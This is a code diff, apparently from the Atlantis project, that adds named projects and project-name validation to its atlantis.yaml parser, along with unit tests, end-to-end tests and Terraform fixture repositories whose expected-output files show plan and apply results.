+func (p *ParserValidator) ReadConfig(repoDir string) (valid.Spec, error) {
 	configFile := filepath.Join(repoDir, AtlantisYAMLFilename)
 	configData, err := ioutil.ReadFile(configFile)
 
@@ -37,14 +37,14 @@ func (r *ParserValidator) ReadConfig(repoDir string) (valid.Spec, error) {
 	}
 
 	// If the config file exists, parse it.
-	config, err := r.parseAndValidate(configData)
+	config, err := p.parseAndValidate(configData)
 	if err != nil {
 		return valid.Spec{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename)
 	}
 	return config, err
 }
 
-func (r *ParserValidator) parseAndValidate(configData []byte) (valid.Spec, error) {
+func (p *ParserValidator) parseAndValidate(configData []byte) (valid.Spec, error) {
 	var rawSpec raw.Spec
 	if err := yaml.UnmarshalStrict(configData, &rawSpec); err != nil {
 		return valid.Spec{}, err
@@ -58,20 +58,73 @@ func (r *ParserValidator) parseAndValidate(configData []byte) (valid.Spec, error
 	}
 
 	// Top level validation.
-	for _, p := range rawSpec.Projects {
-		if p.Workflow != nil {
-			workflow := *p.Workflow
-			found := false
-			for k := range rawSpec.Workflows {
-				if k == workflow {
-					found = true
-				}
-			}
-			if !found {
-				return valid.Spec{}, fmt.Errorf("workflow %q is not defined", workflow)
+	if err := p.validateWorkflows(rawSpec); err != nil {
+		return valid.Spec{}, err
+	}
+
+	validSpec := rawSpec.ToValid()
+	if err := p.validateProjectNames(validSpec); err != nil {
+		return valid.Spec{}, err
+	}
+
+	return validSpec, nil
+}
+
+func (p *ParserValidator) validateProjectNames(spec valid.Spec) error {
+	// First, validate that all names are unique.
+	seen := make(map[string]bool)
+	for _, project := range spec.Projects {
+		if project.Name != nil {
+			name := *project.Name
+			exists := seen[name]
+			if exists {
+				return fmt.Errorf("found two or more projects with name %q; project names must be unique", name)
 			}
+			seen[name] = true
 		}
 	}
 
-	return rawSpec.ToValid(), nil
+	// Next, validate that all dir/workspace combos are named.
+	// This map's keys will be 'dir/workspace' and the values are the names for
+	// that project.
+	dirWorkspaceToNames := make(map[string][]string)
+	for _, project := range spec.Projects {
+		key := fmt.Sprintf("%s/%s", project.Dir, project.Workspace)
+		names := dirWorkspaceToNames[key]
+
+		// If there is already a project with this dir/workspace then this
+		// project must have a name.
+		if len(names) > 0 && project.Name == nil {
+			return fmt.Errorf("there are two or more projects with dir: %q workspace: %q that are not all named; they must have a 'name' key so they can be targeted for apply's separately", project.Dir, project.Workspace)
+		}
+		var name string
+		if project.Name != nil {
+			name = *project.Name
+		}
+		dirWorkspaceToNames[key] = append(dirWorkspaceToNames[key], name)
+	}
+
+	return nil
+}
+
+func (p *ParserValidator) validateWorkflows(spec raw.Spec) error {
+	for _, project := range spec.Projects {
+		if err := p.validateWorkflowExists(project, spec.Workflows); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func (p *ParserValidator) validateWorkflowExists(project raw.Project, workflows map[string]raw.Workflow) error {
+	if project.Workflow == nil {
+		return nil
+	}
+	workflow := *project.Workflow
+	for k := range workflows {
+		if k == workflow {
+			return nil
+		}
+	}
+	return fmt.Errorf("workflow %q is not defined", workflow)
 }
diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go
index 15bcd19602..abafcba940 100644
--- a/server/events/yaml/parser_validator_test.go
+++ b/server/events/yaml/parser_validator_test.go
@@ -262,6 +262,78 @@ projects:
   workflow: undefined`,
 			expErr: "workflow \"undefined\" is not defined",
 		},
+		{
+			description: "two projects with same dir/workspace without names",
+			input: `
+version: 2
+projects:
+- dir: .
+  workspace: workspace
+- dir: .
+  workspace: workspace`,
+			expErr: "there are two or more projects with dir: \".\" workspace: \"workspace\" that are not all named; they must have a 'name' key so they can be targeted for apply's separately",
+		},
+		{
+			description: "two projects with same dir/workspace only one with name",
+			input: `
+version: 2
+projects:
+- name: myname
+  dir: .
+  workspace: workspace
+- dir: .
+  workspace: workspace`,
+			expErr: "there are two or more projects with dir: \".\" workspace: \"workspace\" that are not all named; they must have a 'name' key so they can be targeted for apply's separately",
+		},
+		{
+			description: "two projects with same dir/workspace both with same name",
+			input: `
+version: 2
+projects:
+- name: myname
+  dir: .
+  workspace: workspace
+- name: myname
+  dir: .
+  workspace: workspace`,
+			expErr: "found two or more projects with name \"myname\"; project names must be unique",
+		},
+		{
+			description: "two projects with same dir/workspace with different names",
+			input: `
+version: 2
+projects:
+- name: myname
+  dir: .
+  workspace: workspace
+- name: myname2
+  dir: .
+  workspace: workspace`,
+			exp: valid.Spec{
+				Version: 2,
+				Projects: []valid.Project{
+					{
+						Name:      String("myname"),
+						Dir:       ".",
+						Workspace: "workspace",
+						Autoplan: valid.Autoplan{
+							WhenModified: []string{"**/*.tf"},
+							Enabled:      true,
+						},
+					},
+					{
+						Name:      String("myname2"),
+						Dir:       ".",
+						Workspace: "workspace",
+						Autoplan: valid.Autoplan{
+							WhenModified: []string{"**/*.tf"},
+							Enabled:      true,
+						},
+					},
+				},
+				Workflows: map[string]valid.Workflow{},
+			},
+		},
 	}
 
 	tmpDir, cleanup := TempDir(t)
diff --git a/server/events/yaml/raw/project.go b/server/events/yaml/raw/project.go
index 29335e7954..3de10b5320 100644
--- a/server/events/yaml/raw/project.go
+++ b/server/events/yaml/raw/project.go
@@ -16,6 +16,7 @@ const (
 )
 
 type Project struct {
+	Name              *string   `yaml:"name,omitempty"`
 	Dir               *string   `yaml:"dir,omitempty"`
 	Workspace         *string   `yaml:"workspace,omitempty"`
 	Workflow          *string   `yaml:"workflow,omitempty"`
@@ -78,5 +79,7 @@ func (p Project) ToValid() valid.Project {
 	// There are no default apply requirements.
 	v.ApplyRequirements = p.ApplyRequirements
 
+	v.Name = p.Name
+
 	return v
 }
diff --git a/server/events/yaml/raw/project_test.go b/server/events/yaml/raw/project_test.go
index b10452afeb..79f0cf7dbf 100644
--- a/server/events/yaml/raw/project_test.go
+++ b/server/events/yaml/raw/project_test.go
@@ -27,11 +27,13 @@ func TestProject_UnmarshalYAML(t *testing.T) {
 				TerraformVersion:  nil,
 				Autoplan:          nil,
 				ApplyRequirements: nil,
+				Name:              nil,
 			},
 		},
 		{
 			description: "all fields set",
 			input: `
+name: myname
 dir: mydir
 workspace: workspace
 workflow: workflow
@@ -42,6 +44,7 @@ autoplan:
 apply_requirements:
 - mergeable`,
 			exp: raw.Project{
+				Name:             String("myname"),
 				Dir:              String("mydir"),
 				Workspace:        String("workspace"),
 				Workflow:         String("workflow"),
@@ -168,6 +171,7 @@ func TestProject_ToValid(t *testing.T) {
 					Enabled:      true,
 				},
 				ApplyRequirements: nil,
+				Name:              nil,
 			},
 		},
 		{
@@ -182,6 +186,7 @@ func TestProject_ToValid(t *testing.T) {
 					Enabled:      Bool(false),
 				},
 				ApplyRequirements: []string{"approved"},
+				Name:              String("myname"),
 			},
 			exp: valid.Project{
 				Dir:              ".",
@@ -193,6 +198,7 @@ func TestProject_ToValid(t *testing.T) {
 					Enabled:      false,
 				},
 				ApplyRequirements: []string{"approved"},
+				Name:              String("myname"),
 			},
 		},
 		{
diff --git a/server/events/yaml/raw/step.go b/server/events/yaml/raw/step.go
index b414f4607f..af17335c1b 100644
--- a/server/events/yaml/raw/step.go
+++ b/server/events/yaml/raw/step.go
@@ -3,6 +3,7 @@ package raw
 import (
 	"errors"
 	"fmt"
+	"sort"
 	"strings"
 
 	"github.com/flynn-archive/go-shlex"
@@ -93,6 +94,8 @@ func (s Step) Validate() error {
 		for k := range elem {
 			keys = append(keys, k)
 		}
+		// Sort so tests can be deterministic.
+		sort.Strings(keys)
 
 		if len(keys) > 1 {
 			return fmt.Errorf("step element can only contain a single key, found %d: %s",
diff --git a/server/events/yaml/valid/valid.go b/server/events/yaml/valid/valid.go
index 0a7ef2e972..fd182902aa 100644
--- a/server/events/yaml/valid/valid.go
+++ b/server/events/yaml/valid/valid.go
@@ -40,9 +40,19 @@ func (s Spec) FindProject(dir string, workspace string) *Project {
 	return nil
 }
 
+func (s Spec) FindProjectByName(name string) *Project {
+	for _, p := range s.Projects {
+		if p.Name != nil && *p.Name == name {
+			return &p
+		}
+	}
+	return nil
+}
+
 type Project struct {
 	Dir               string
 	Workspace         string
+	Name              *string
 	Workflow          *string
 	TerraformVersion  *version.Version
 	Autoplan          Autoplan
diff --git a/server/events_controller.go b/server/events_controller.go
index d9e344fe55..e41fe75c23 100644
--- a/server/events_controller.go
+++ b/server/events_controller.go
@@ -182,7 +182,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep
 		// We use a Command to represent autoplanning but we set dir and
 		// workspace to '*' to indicate that all applicable dirs and workspaces
 		// should be planned.
-		autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", true)
+		autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", "", true)
 		e.Logger.Info("executing command %s", autoplanCmd)
 		if !e.TestingMode {
 			go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd)
@@ -250,7 +250,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo
 		e.respond(w, logging.Debug, http.StatusOK, "Ignoring non-command comment: %q", truncated)
 		return
 	}
-	e.Logger.Info("parsed comment as %s", parseResult)
+	e.Logger.Info("parsed comment as %s", parseResult.Command)
 
 	// At this point we know it's a command we're not supposed to ignore, so now
 	// we check if this repo is allowed to run commands in the first place.
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index 2cd7183c07..3853d1349b 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -31,23 +31,10 @@ import (
 	. "github.com/runatlantis/atlantis/testing"
 )
 
-/*
-flows:
-- pull request opened autoplan
-- comment to apply
-
-github/gitlab
-
-locking
-
-merging pull requests
-
-different repo organizations
-
-atlantis.yaml
-
-*/
 func TestGitHubWorkflow(t *testing.T) {
+	if testing.Short() {
+		t.SkipNow()
+	}
 	RegisterMockTestingT(t)
 
 	cases := []struct {
@@ -136,7 +123,31 @@ func TestGitHubWorkflow(t *testing.T) {
 				"atlantis apply -d staging", "exp-output-apply-staging.txt",
 				"atlantis apply -d production", "exp-output-apply-production.txt",
 			},
-			ExpMergeCommentFile: "exp-output-merge-all-dirs.txt",
+			ExpMergeCommentFile: "exp-output-merge.txt",
+		},
+		{
+			Description:            "tfvars-yaml",
+			RepoDir:                "tfvars-yaml",
+			ModifiedFiles:          []string{"main.tf"},
+			ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+			CommentAndReplies: []string{
+				"atlantis apply -p staging", "exp-output-apply-staging.txt",
+				"atlantis apply -p default", "exp-output-apply-default.txt",
+			},
+			ExpMergeCommentFile: "exp-output-merge.txt",
+		},
+		{
+			Description:            "tfvars no autoplan",
+			RepoDir:                "tfvars-yaml-no-autoplan",
+			ModifiedFiles:          []string{"main.tf"},
+			ExpAutoplanCommentFile: "",
+			CommentAndReplies: []string{
+				"atlantis plan -p staging", "exp-output-plan-staging.txt",
+				"atlantis plan -p default", "exp-output-plan-default.txt",
+				"atlantis apply -p staging", "exp-output-apply-staging.txt",
+				"atlantis apply -p default", "exp-output-apply-default.txt",
+			},
+			ExpMergeCommentFile: "exp-output-merge.txt",
 		},
 	}
 	for _, c := range cases {
@@ -156,8 +167,10 @@ func TestGitHubWorkflow(t *testing.T) {
 			pullOpenedReq := GitHubPullRequestOpenedEvent(t)
 			ctrl.Post(w, pullOpenedReq)
 			responseContains(t, w, 200, "Processing...")
-			_, _, autoplanComment := vcsClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
-			assertCommentEquals(t, c.ExpAutoplanCommentFile, autoplanComment, c.RepoDir)
+			if c.ExpAutoplanCommentFile != "" {
+				_, _, autoplanComment := vcsClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+				assertCommentEquals(t, c.ExpAutoplanCommentFile, autoplanComment, c.RepoDir)
+			}
 
 			// Now send any other comments.
 			for i := 0; i < len(c.CommentAndReplies); i += 2 {
@@ -414,9 +427,10 @@ func assertCommentEquals(t *testing.T, expFile string, act string, repoDir strin
 	exp, err := ioutil.ReadFile(filepath.Join(absRepoPath(t, repoDir), expFile))
 	Ok(t, err)
 
-	// Replace all 'ID: 1111818181' strings with * so we can do a comparison.
-	idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`)
-	act = idRegex.ReplaceAllString(act, "(ID: ******************)")
+	// Replace all 'Creation complete after 1s ID: 1111818181' strings with
+	// 'Creation complete after *s ID: **********' so we can do a comparison.
+	idRegex := regexp.MustCompile(`Creation complete after [0-9]+s \(ID: [0-9]+\)`)
+	act = idRegex.ReplaceAllString(act, "Creation complete after *s (ID: ******************)")
 
 	if string(exp) != act {
 		actFile := filepath.Join(absRepoPath(t, repoDir), expFile+".act")
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt
index 81c3ec8bfa..f0608bcf22 100644
--- a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt
@@ -1,7 +1,7 @@
 Ran Apply in dir: `production` workspace: `default`
 ```diff
 module.null.null_resource.this: Creating...
-module.null.null_resource.this: Creation complete after 0s (ID: ******************)
+module.null.null_resource.this: Creation complete after *s (ID: ******************)
 
 Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
 
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt
index 2ec35e2786..ffc7878fe5 100644
--- a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt
@@ -1,7 +1,7 @@
 Ran Apply in dir: `staging` workspace: `default`
 ```diff
 module.null.null_resource.this: Creating...
-module.null.null_resource.this: Creation complete after 0s (ID: ******************)
+module.null.null_resource.this: Creation complete after *s (ID: ******************)
 
 Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
 
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt
index b64103b412..9712df1ee2 100644
--- a/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt
@@ -1,4 +1,4 @@
 Locks and plans deleted for the projects and workspaces modified in this pull request:
 
-- path: `runatlantis/atlantis-tests/staging` workspace: `default`
-- path: `runatlantis/atlantis-tests/.` workspace: `default`
+- path: `runatlantis/atlantis-tests/production` workspace: `default`
+- path: `runatlantis/atlantis-tests/staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt
index 81c3ec8bfa..f0608bcf22 100644
--- a/server/testfixtures/test-repos/modules/exp-output-apply-production.txt
+++ b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt
@@ -1,7 +1,7 @@
 Ran Apply in dir: `production` workspace: `default`
 ```diff
 module.null.null_resource.this: Creating...
-module.null.null_resource.this: Creation complete after 0s (ID: ******************)
+module.null.null_resource.this: Creation complete after *s (ID: ******************)
 
 Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
 
diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt
index 2ec35e2786..ffc7878fe5 100644
--- a/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt
+++ b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt
@@ -1,7 +1,7 @@
 Ran Apply in dir: `staging` workspace: `default`
 ```diff
 module.null.null_resource.this: Creating...
-module.null.null_resource.this: Creation complete after 0s (ID: ******************)
+module.null.null_resource.this: Creation complete after *s (ID: ******************)
 
 Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
 
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt
index 4c1f22f7a9..93654c7deb 100644
--- a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt
@@ -1,7 +1,7 @@
 Ran Apply in dir: `.` workspace: `default`
 ```diff
 null_resource.simple: Creating...
-null_resource.simple: Creation complete after 0s (ID: ******************)
+null_resource.simple: Creation complete after *s (ID: ******************)
 
 Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
 
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt
index d467c8c713..6aed57ab53 100644
--- a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt
@@ -1,7 +1,7 @@
 Ran Apply in dir: `.` workspace: `staging`
 ```diff
 null_resource.simple: Creating...
-null_resource.simple: Creation complete after 0s (ID: ******************)
+null_resource.simple: Creation complete after *s (ID: ******************)
 
 Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
 
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt
index ef14ca06f5..59398bd4e5 100644
--- a/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt
+++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt
@@ -1,7 +1,7 @@
 Ran Apply in dir: `.` workspace: `default`
 ```diff
 null_resource.simple: Creating...
-null_resource.simple: Creation complete after 0s (ID: ******************)
+null_resource.simple: Creation complete after *s (ID: ******************)
 
 Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
 
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt
index e17039ffce..e167833832 100644
--- a/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt
+++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt
@@ -1,7 +1,7 @@
 Ran Apply in dir: `.` workspace: `new_workspace`
 ```diff
 null_resource.simple: Creating...
-null_resource.simple: Creation complete after 0s (ID: ******************)
+null_resource.simple: Creation complete after *s (ID: ******************)
 
 Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
 
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt
index 8c49494b4a..bd2cd1207b 100644
--- a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt
+++ b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt
@@ -1,7 +1,7 @@
 Ran Apply in dir: `.` workspace: `default`
 ```diff
 null_resource.simple: Creating...
-null_resource.simple: Creation complete after 0s (ID: ******************)
+null_resource.simple: Creation complete after *s (ID: ******************)
 
 Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
 
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply.txt b/server/testfixtures/test-repos/simple/exp-output-apply.txt
index 6c123ea8f5..ea31933908 100644
--- a/server/testfixtures/test-repos/simple/exp-output-apply.txt
+++ b/server/testfixtures/test-repos/simple/exp-output-apply.txt
@@ -1,7 +1,7 @@
 Ran Apply in dir: `.` workspace: `default`
 ```diff
 null_resource.simple: Creating...
-null_resource.simple: Creation complete after 0s (ID: ******************)
+null_resource.simple: Creation complete after *s (ID: ******************)
 
 Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
 
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml
new file mode 100644
index 0000000000..8dbfe353ec
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml
@@ -0,0 +1,29 @@
+version: 2
+projects:
+- dir: .
+  name: default
+  workflow: default
+  autoplan:
+    enabled: false
+- dir: .
+  workflow: staging
+  name: staging
+  autoplan:
+    enabled: false
+workflows:
+  default:
+    plan:
+      steps:
+      - run: rm -rf .terraform
+      - init:
+          extra_args: [-backend-config=default.backend.tfvars]
+      - plan:
+          extra_args: [-var-file=default.tfvars]
+  staging:
+    plan:
+      steps:
+      - run: rm -rf .terraform
+      - init:
+          extra_args: [-backend-config=staging.backend.tfvars]
+      - plan:
+          extra_args: [-var-file, staging.tfvars]
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars
new file mode 100644
index 0000000000..a03acf6e2d
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars
@@ -0,0 +1 @@
+path = "default.tfstate"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars
new file mode 100644
index 0000000000..c5e157a5d5
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars
@@ -0,0 +1 @@
+var = "default"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt
new file mode 100644
index 0000000000..9ccb1a95d6
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt
@@ -0,0 +1,21 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+The state of your infrastructure has been saved to the path
+below. This state is required to modify and destroy your
+infrastructure, so keep it safe. To inspect the complete state
+use the `terraform show` command.
+
+State path: default.tfstate
+
+Outputs:
+
+var = default
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..e0d34d0905
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt
@@ -0,0 +1,21 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+The state of your infrastructure has been saved to the path
+below. This state is required to modify and destroy your
+infrastructure, so keep it safe. To inspect the complete state
+use the `terraform show` command.
+
+State path: staging.tfstate
+
+Outputs:
+
+var = staging
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt
new file mode 100644
index 0000000000..c09b916bd6
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/.` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf
new file mode 100644
index 0000000000..d4d77ff4e7
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf
@@ -0,0 +1,19 @@
+terraform {
+  backend "local" {
+  }
+}
+
+resource "null_resource" "simple" {
+  count = 1
+}
+
+variable "var" {
+}
+
+output "var" {
+  value = "${var.var}"
+}
+
+output "workspace" {
+  value = "${terraform.workspace}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars
new file mode 100644
index 0000000000..e8133a2b59
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars
@@ -0,0 +1 @@
+path = "staging.tfstate"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars
new file mode 100644
index 0000000000..34f4bbb990
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars
@@ -0,0 +1 @@
+var = "staging"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml b/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml
new file mode 100644
index 0000000000..217e8fd995
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml
@@ -0,0 +1,25 @@
+version: 2
+projects:
+- dir: .
+  name: default
+  workflow: default
+- dir: .
+  workflow: staging
+  name: staging
+workflows:
+  default:
+    plan:
+      steps:
+      - run: rm -rf .terraform
+      - init:
+          extra_args: [-backend-config=default.backend.tfvars]
+      - plan:
+          extra_args: [-var-file=default.tfvars]
+  staging:
+    plan:
+      steps:
+      - run: rm -rf .terraform
+      - init:
+          extra_args: [-backend-config=staging.backend.tfvars]
+      - plan:
+          extra_args: [-var-file, staging.tfvars]
diff --git a/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars
new file mode 100644
index 0000000000..a03acf6e2d
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars
@@ -0,0 +1 @@
+path = "default.tfstate"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/default.tfvars b/server/testfixtures/test-repos/tfvars-yaml/default.tfvars
new file mode 100644
index 0000000000..c5e157a5d5
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/default.tfvars
@@ -0,0 +1 @@
+var = "default"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt
new file mode 100644
index 0000000000..9ccb1a95d6
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt
@@ -0,0 +1,21 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+The state of your infrastructure has been saved to the path
+below. This state is required to modify and destroy your
+infrastructure, so keep it safe. To inspect the complete state
+use the `terraform show` command.
+
+State path: default.tfstate
+
+Outputs:
+
+var = default
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act
new file mode 100644
index 0000000000..aa4f734726
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act
@@ -0,0 +1,7 @@
+Ran Apply in dir: `.` workspace: `default`
+**Apply Error**
+```
+no plan found at path "." and workspace "default"–did you run plan?
+```
+
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..e0d34d0905
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt
@@ -0,0 +1,21 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+The state of your infrastructure has been saved to the path
+below. This state is required to modify and destroy your
